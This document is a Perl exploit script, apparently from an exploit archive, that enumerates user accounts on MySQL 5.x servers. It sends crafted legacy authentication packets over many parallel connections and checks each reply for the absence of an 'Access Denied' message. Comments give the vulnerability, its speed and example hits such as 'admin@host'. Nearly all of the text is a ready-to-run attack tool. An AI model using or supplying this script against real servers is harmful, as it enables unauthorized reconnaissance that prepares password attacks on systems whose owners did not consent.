Oracle MySQL User Account Enumeration Utility

`# MySQL User Account Enumeration Utility  
# When an attacker authenticates using an incorrect password  
# with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server  
# the mysql server will respond with a different message than Access Denied, what makes  
# User Account Enumeration possible.  
# The Downside is that the attacker has to reconnect for each user enumeration attempt  
#20000 user accounts in 7 minutes  
#Mon Jan 16 09:00:18 UTC 2012  
#Mon Jan 16 09:07:26 UTC 2012  
#root@vs2067037:~# wc -l MEDIUM.LST  
#21109 MEDIUM.LST  
#A usernames.txt wordlist is included in this package  
#examples:  
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt  
#  
#[*] HIT! -- USER EXISTS: administrator@host  
#  
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt  
#  
#[*] HIT! -- USER EXISTS: admin@host  
#  
  
use IO::Socket;  
use Parallel::ForkManager;  
$|=1;  
  
if ($#ARGV != 1) {  
print "Usage: mysqlenumerate.pl <target> <wordlist>\n";  
exit;  
}  
  
$target = $ARGV[0];  
$wordlist = $ARGV[1];  
$numforks = 50;  
$pm = new Parallel::ForkManager($numforks);  
  
open FILE,"<$wordlist";  
unlink '/tmp/cracked';  
  
@users = ();  
$k=0;  
while(<FILE>) {  
chomp;  
$_ =~ s/\r//g;  
$users[$k++] = $_;  
}  
close FILE;  
$k2 = 0;  
for(;;) {  
for ($k=0;$k<$numforks;$k++) {  
$k2++;  
if (($k2 > $#users) or (-e '/tmp/cracked')) {  
exit;  
}  
my $pid = $pm->start and next;  
$user = $users[$k2];  
goto further;  
again:  
print "Connect Error\n";  
further:  
my $sock = IO::Socket::INET->new(PeerAddr => $target,  
PeerPort => '3306',  
Proto => 'tcp') || goto again;  
recv($sock, $buff, 1024, 0);  
  
$buf = "\x00\x00\x01\x8d\x00\x00\x00\x00$user\x00\x50".  
"\x4e\x5f\x51\x55\x45\x4d\x45\x00";  
$buf = chr(length($buf)-3). $buf;  
print $sock $buf;  
$res = recv($sock, $buff, 1024, 0);  
close($sock);  
if ($k2 % 100 == 0) {  
print $buff."\n";  
}  
if (substr($buff, 7, 6) eq "Access") {$pm->finish;next;}  
unless (-e '/tmp/cracked') {  
open FILE, ">/tmp/cracked";  
close FILE;  
print "\n[*] HIT! -- USER EXISTS: $user\@$target\n";  
open FILE, ">jackpot";  
print FILE "\n[*] HIT! -- USER EXISTS: $user\@$target\n";  
exit;  
}  
}  
$pm->wait_all_children;  
}  
`